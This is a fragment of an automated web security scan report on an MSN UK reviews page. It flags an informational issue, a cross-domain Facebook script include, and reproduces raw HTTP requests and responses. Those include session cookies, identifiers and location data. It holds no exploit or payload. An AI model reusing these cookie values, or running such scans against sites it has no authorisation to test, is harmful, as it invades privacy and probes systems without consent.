HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA28 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:23 GMT ntCoent-Length: 93393 Content-Length: 93393 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.20. http://tech.uk.msn.com/reviews/
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/reviews/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /reviews/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/reviews/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA30 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:44 GMT ntCoent-Length: 61256 Content-Length: 61256 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
Report generated by XSS.CX at Fri Aug 19 10:21:55 GMT-06:00 2011.